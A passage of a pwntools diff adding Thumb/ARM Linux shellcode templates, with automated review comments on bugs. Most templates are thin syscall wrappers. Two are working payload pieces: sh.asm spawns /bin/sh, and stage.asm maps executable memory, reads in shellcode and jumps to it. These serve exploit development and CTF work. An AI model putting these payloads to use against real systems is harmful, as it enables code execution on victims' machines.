b/pwnlib/shellcraft/templates/thumb/linux/setreuid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="ruid, euid"/> +<%docstring> +Invokes the syscall setreuid. See 'man 2 setreuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + + + ${syscall('SYS_setreuid', ruid, euid)} 
diff --git a/pwnlib/shellcraft/templates/thumb/linux/setrlimit.asm b/pwnlib/shellcraft/templates/thumb/linux/setrlimit.asm new file mode 100644 index 000000000..949c2eff7 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setsid.asm b/pwnlib/shellcraft/templates/thumb/linux/setsid.asm new file mode 100644 index 000000000..7deec8f54 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/settimeofday.asm b/pwnlib/shellcraft/templates/thumb/linux/settimeofday.asm new file mode 100644 index 000000000..5e0ab5a34 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/settimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setuid.asm b/pwnlib/shellcraft/templates/thumb/linux/setuid.asm new file mode 100644 index 000000000..2dfd2668c --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setuid.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sh.asm b/pwnlib/shellcraft/templates/thumb/linux/sh.asm index 5096562b1..ea9527286 100644 --- a/pwnlib/shellcraft/templates/thumb/linux/sh.asm +++ b/pwnlib/shellcraft/templates/thumb/linux/sh.asm @@ -1,12 +1,11 @@ -<% from pwnlib.shellcraft.thumb import mov %> -<%docstring>Execute /bin/sh +<% from pwnlib.shellcraft import thumb %> +<%docstring> +Execute a different process. - adr r0, execve_addr - ${mov('r2', 0)} - ${mov('r7', 'SYS_execve')} - push {r0, r2} - mov r1, sp - svc 1 - .balign 4, 1 -execve_addr: - .ascii "/bin/sh" + >>> p = run_assembly(shellcraft.thumb.linux.sh()) + >>> p.sendline('echo Hello') + >>> p.recv() + 'Hello\n' + + +${thumb.linux.execve('/bin///sh', 0, 0)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sigaction.asm b/pwnlib/shellcraft/templates/thumb/linux/sigaction.asm new file mode 100644 index 000000000..4df3c81c0 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/thumb/linux/sigaltstack.asm new file mode 100644 index 000000000..89f422b13 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sigaltstack.asm 
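Review bot: The new docstring line `Execute a different process.` is lifted from the execve template and misdescribes this one, whose only body line `${thumb.linux.execve('/bin///sh', 0, 0)}` hard-codes the program and passes 0 for both argv and envp. I would restore a precise summary, `Execute /bin/sh via execve, with argv and envp both NULL.`, and add a one-line note that the path is spelled `/bin///sh` presumably so it fills exactly two 32-bit words with no NUL inside the string (confirm against the execve template), since that is the one non-obvious thing left in the file. The old hand-written version ended in `svc 1`; the new output now depends on whatever the shared syscall template emits, so the doctest here is also the only place that pins the generated bytes — worth stating in the docstring.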
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/signal.asm b/pwnlib/shellcraft/templates/thumb/linux/signal.asm new file mode 100644 index 000000000..b46680c0b --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/signal.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sigpending.asm b/pwnlib/shellcraft/templates/thumb/linux/sigpending.asm new file mode 100644 index 000000000..106213ff5 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sigpending.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/thumb/linux/sigprocmask.asm new file mode 100644 index 000000000..4f28c6fff --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sigprocmask.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="how, set, oset"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + + + ${syscall('SYS_sigprocmask', how, set, oset)} 
diff --git a/pwnlib/shellcraft/templates/thumb/linux/sigreturn.asm b/pwnlib/shellcraft/templates/thumb/linux/sigreturn.asm new file mode 100644 index 000000000..c29fd5f3c --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sigreturn.asm @@ -0,0 +1,10 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="scp"/> +<%docstring> +Invokes the syscall sigreturn. See 'man 2 sigreturn' for more information. + + + ${syscall('SYS_sigreturn')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/thumb/linux/sigsuspend.asm new file mode 100644 index 000000000..420a7bfd9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sigsuspend.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/splice.asm b/pwnlib/shellcraft/templates/thumb/linux/splice.asm new file mode 100644 index 000000000..d5445be7e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/splice.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/stage.asm b/pwnlib/shellcraft/templates/thumb/linux/stage.asm new file mode 100644 index 000000000..446a9526a --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/stage.asm 
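Review bot: `<%page args="scp"/>` declares a required parameter that the body never uses — the call is `${syscall('SYS_sigreturn')}` with no arguments — so every caller must pass a value that is silently discarded, and unlike the sibling templates this one has no `Arguments:` section saying so. If the intent is that the kernel reads the signal frame from the stack rather than a register (my understanding of sigreturn, but nothing in the generated output says it), make that explicit with `<%page args="scp=None"/>` and a docstring line `scp: accepted for signature compatibility only; the kernel takes the frame from the stack.` Otherwise pass it through the way the other templates do, `${syscall('SYS_sigreturn', scp)}`.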
@@ -0,0 +1,62 @@ +<% +from pwnlib.shellcraft.thumb import push +from pwnlib.shellcraft.thumb.linux import read, readn, mmap +from pwnlib import constants as C +%> +<%page args="fd=0, length=None"/> +<%docstring> +Migrates shellcode to a new buffer. + +Arguments: + fd(int): + Integer file descriptor to recv data from. + Default is stdin (0). + length(int): + Optional buffer length. If None, the first pointer-width + of data received is the length. + +Example: + + >>> p = run_assembly(shellcraft.stage()) + >>> sc = asm(shellcraft.echo("Hello\n", constants.STDOUT_FILENO)) + >>> p.pack(len(sc)) + >>> p.send(sc) + >>> p.recvline() + 'Hello\n' + +<% + protection = C.PROT_READ | C.PROT_WRITE | C.PROT_EXEC + flags = C.MAP_ANONYMOUS | C.MAP_PRIVATE + + assert isinstance(fd, int) +%> +%if length is None: + /* How many bytes should we receive? */ + ${read(fd, 'sp', 4)} + pop {r2} + push {r2} /* Save exact size */ +%else: + ${push(length)} +%endif + + /* Page-align, assume <4GB */ + lsr r2, #12 + add r2, r2, #1 + lsl r2, #12 + + /* Map it */ + ${mmap(0, 'r2', protection, flags, 0, 0)} + + /* Grab the saved size, save the address */ + pop {r3} + + /* We need to jump to thumb code, so it must be odd */ + push {r0} + + /* Read in all of the data */ + ${readn(fd, 'r0', 'r3')} + + /* Go to shellcode */ + pop {r2} + add r2, r2, #1 + bx r2 diff --git a/pwnlib/shellcraft/templates/thumb/linux/stat.asm b/pwnlib/shellcraft/templates/thumb/linux/stat.asm new file mode 100644 index 000000000..e76e6bc2c --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} 
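Review bot: In the `%else:` branch (caller supplied `length`) r2 is never loaded before `lsr r2, #12` — only `${push(length)}` runs — so the page rounding and the `mmap(0, 'r2', ...)` size operate on whatever r2 held on entry, unless `thumb.push` happens to stage the value in r2, which its interface does not promise. Mirror the read branch by following the push with `pop {r2}` / `push {r2}`, so the exact size stays saved on the stack and r2 holds it for the alignment math. Separately, the mmap result in r0 is used as the readn destination and later as the jump target without any check for a negative errno; for a stager that is a common size trade-off, but it deserves a comment so nobody debugs a crash in readn when mmap fails. The comment `/* We need to jump to thumb code, so it must be odd */` sits on `push {r0}` and belongs next to `add r2, r2, #1` at the end.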
diff --git a/pwnlib/shellcraft/templates/thumb/linux/stat64.asm b/pwnlib/shellcraft/templates/thumb/linux/stat64.asm new file mode 100644 index 000000000..14bdb6def --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/stat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/stime.asm b/pwnlib/shellcraft/templates/thumb/linux/stime.asm new file mode 100644 index 000000000..e7aee2f68 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/stime.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/stty.asm b/pwnlib/shellcraft/templates/thumb/linux/stty.asm new file mode 100644 index 000000000..66c1c0a06 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/symlink.asm b/pwnlib/shellcraft/templates/thumb/linux/symlink.asm new file mode 100644 index 000000000..0067805b9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/symlink.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/symlinkat.asm b/pwnlib/shellcraft/templates/thumb/linux/symlinkat.asm new file mode 100644 index 000000000..52cec7c72 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> +Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sync.asm b/pwnlib/shellcraft/templates/thumb/linux/sync.asm new file mode 100644 index 000000000..e7fdefb95 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/thumb/linux/sync_file_range.asm new file mode 100644 index 000000000..423e5838e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} 
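Review bot: In symlink.asm, `<%page args="from, to"/>` uses `from`, a Python reserved word; Mako compiles page args into the parameter list of a generated Python function, so as far as I can tell this template fails to compile the first time `shellcraft.thumb.linux.symlink` is rendered instead of producing code. Rename the parameter in the args line, the docstring and the call together, e.g. `<%page args="from_, to"/>`, `from_(char): from_`, `${syscall('SYS_symlink', from_, to)}`. If the generator derives names from the C prototype, it needs a keyword-avoidance step so the same breakage does not come back on regeneration.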
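Review bot: In symlinkat.asm, `<%page args="from, tofd, to"/>` has the same problem as its neighbour: `from` is a Python keyword, and Mako turns page args into Python function parameters, so rendering `shellcraft.thumb.linux.symlinkat` should raise a syntax error rather than emit assembly. Change the three places in step, `<%page args="from_, tofd, to"/>`, `from_(char): from_`, `${syscall('SYS_symlinkat', from_, tofd, to)}`. None of the other new templates in this batch use a reserved word, so a single keyword check in the generator would cover both cases.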
diff --git a/pwnlib/shellcraft/templates/thumb/linux/syscall.asm b/pwnlib/shellcraft/templates/thumb/linux/syscall.asm index 3dd927616..2b0d6a501 100644 --- a/pwnlib/shellcraft/templates/thumb/linux/syscall.asm +++ b/pwnlib/shellcraft/templates/thumb/linux/syscall.asm @@ -1,9 +1,8 @@ <% from pwnlib.shellcraft import thumb - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context + from pwnlib.constants import eval + from pwnlib.abi import linux_arm_syscall as abi %> - - <%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4 = None, arg5 = None, arg6 = None"/> <%docstring> Args: [syscall_number, \*args] @@ -19,13 +18,13 @@ Example: mov r1, sp mov r2, #2 eor r3, r3 - mov r7, #11 - swi #0 + mov r7, #0xb + svc 0x41 >>> print shellcraft.thumb.linux.syscall('SYS_exit', 0).rstrip() /* call exit(0) */ eor r0, r0 - mov r7, #(SYS_exit) - swi #0 + mov r7, #(SYS_exit) /* 1 */ + svc 0x41 <% if isinstance(syscall, (str, unicode)) and syscall.startswith('SYS_'): @@ -46,11 +45,13 @@ Example: while args and args[-1] == '?': args.pop() syscall_repr = syscall_repr % ', '.join(args) + + registers = abi.register_arguments + arguments = [syscall, arg0, arg1, arg2, arg3, arg4, arg5] + regctx = dict(zip(registers, arguments)) %>\ /* call ${syscall_repr} */ -% for dst, src in zip(['r0', 'r1', 'r2', 'r3', 'r4', 'r5', 'r6', 'r7'], [arg0, arg1, arg2, arg3, arg4, arg5, arg6, syscall]): - % if src != None: - ${thumb.mov(dst, src)} - % endif -% endfor - swi #0 +%if any(arguments): + ${thumb.setregs(regctx)} +%endif + svc 0x41 diff --git a/pwnlib/shellcraft/templates/thumb/linux/syslog.asm b/pwnlib/shellcraft/templates/thumb/linux/syslog.asm new file mode 100644 index 000000000..578d83e04 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/syslog.asm 
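Review bot: The new guard `%if any(arguments):` tests truthiness, so when every entry of `[syscall, arg0, ..., arg5]` is 0 or None — e.g. a numeric syscall number 0 with zeroed arguments — `thumb.setregs` is skipped and r7/r0 are left holding whatever they had, producing silently wrong shellcode; the intent is presence, `%if any(a is not None for a in arguments):`. The unchanged context line still declares `arg6`, but the new `arguments` list stops at `arg5`, so a seventh argument is now accepted and dropped without warning — either remove it from the signature or reject it with a comment that only six registers are passed here. The switch from `swi #0` to `svc 0x41` deserves a why-comment on that line, something like `/* immediate is ignored by the kernel under EABI; 0x41 keeps the encoding free of NUL bytes */` (my reading — confirm), since a reader of the doctest will otherwise take 0x41 as meaningful.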
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/tee.asm b/pwnlib/shellcraft/templates/thumb/linux/tee.asm new file mode 100644 index 000000000..d77ee9345 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/tee.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/time.asm b/pwnlib/shellcraft/templates/thumb/linux/time.asm new file mode 100644 index 000000000..a54110cde --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/timer_create.asm b/pwnlib/shellcraft/templates/thumb/linux/timer_create.asm new file mode 100644 index 000000000..73ce44d34 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/timer_create.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} 
diff --git a/pwnlib/shellcraft/templates/thumb/linux/timer_delete.asm b/pwnlib/shellcraft/templates/thumb/linux/timer_delete.asm new file mode 100644 index 000000000..9fcc8d96d --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/timer_delete.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/thumb/linux/timer_getoverrun.asm new file mode 100644 index 000000000..f653646e2 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/thumb/linux/timer_gettime.asm new file mode 100644 index 000000000..803db40d6 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/timer_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/timer_settime.asm b/pwnlib/shellcraft/templates/thumb/linux/timer_settime.asm new file mode 100644 index 000000000..d3cd9969e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/timer_settime.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/truncate.asm b/pwnlib/shellcraft/templates/thumb/linux/truncate.asm new file mode 100644 index 000000000..82d96f851 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/truncate64.asm b/pwnlib/shellcraft/templates/thumb/linux/truncate64.asm new file mode 100644 index 000000000..cf3aaf334 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/truncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/ulimit.asm b/pwnlib/shellcraft/templates/thumb/linux/ulimit.asm new file mode 100644 index 000000000..16771c7d3 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ulimit.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="cmd, vararg"/> +<%docstring> +Invokes the syscall ulimit. See 'man 2 ulimit' for more information. + +Arguments: + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_ulimit', cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/umask.asm b/pwnlib/shellcraft/templates/thumb/linux/umask.asm new file mode 100644 index 000000000..7a2d56ad4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/umask.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="mask"/> +<%docstring> +Invokes the syscall umask. See 'man 2 umask' for more information. + +Arguments: + mask(mode_t): mask + + + ${syscall('SYS_umask', mask)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/uname.asm b/pwnlib/shellcraft/templates/thumb/linux/uname.asm new file mode 100644 index 000000000..a03cd2f4d --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/uname.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall uname. See 'man 2 uname' for more information. + +Arguments: + name(utsname): name + + + ${syscall('SYS_uname', name)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/unlink.asm b/pwnlib/shellcraft/templates/thumb/linux/unlink.asm new file mode 100644 index 000000000..ec7983589 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall unlink. See 'man 2 unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_unlink', name)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/unlinkat.asm b/pwnlib/shellcraft/templates/thumb/linux/unlinkat.asm new file mode 100644 index 000000000..7dcc47472 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/unlinkat.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, name, flag"/> +<%docstring> +Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information. + +Arguments: + fd(int): fd + name(char): name + flag(int): flag + + + ${syscall('SYS_unlinkat', fd, name, flag)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/unshare.asm b/pwnlib/shellcraft/templates/thumb/linux/unshare.asm new file mode 100644 index 000000000..31af0631d --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/unshare.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall unshare. See 'man 2 unshare' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_unshare', flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/ustat.asm b/pwnlib/shellcraft/templates/thumb/linux/ustat.asm new file mode 100644 index 000000000..dc41ad6c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ustat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="dev, ubuf"/> +<%docstring> +Invokes the syscall ustat. See 'man 2 ustat' for more information. + +Arguments: + dev(dev_t): dev + ubuf(ustat): ubuf + + + ${syscall('SYS_ustat', dev, ubuf)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/utime.asm b/pwnlib/shellcraft/templates/thumb/linux/utime.asm new file mode 100644 index 000000000..1efb69d0f --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/utime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, file_times"/> +<%docstring> +Invokes the syscall utime. See 'man 2 utime' for more information. + +Arguments: + file(char): file + file_times(utimbuf): file_times + + + ${syscall('SYS_utime', file, file_times)} 
diff --git a/pwnlib/shellcraft/templates/thumb/linux/utimensat.asm b/pwnlib/shellcraft/templates/thumb/linux/utimensat.asm new file mode 100644 index 000000000..2461b8052 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/utimensat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, path, times, flags"/> +<%docstring> +Invokes the syscall utimensat. See 'man 2 utimensat' for more information. + +Arguments: + fd(int): fd + path(char): path + times(timespec): times + flags(int): flags + + + ${syscall('SYS_utimensat', fd, path, times, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/utimes.asm b/pwnlib/shellcraft/templates/thumb/linux/utimes.asm new file mode 100644 index 000000000..a8ef731dc --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/utimes.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, tvp"/> +<%docstring> +Invokes the syscall utimes. See 'man 2 utimes' for more information. + +Arguments: + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_utimes', file, tvp)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/vfork.asm b/pwnlib/shellcraft/templates/thumb/linux/vfork.asm new file mode 100644 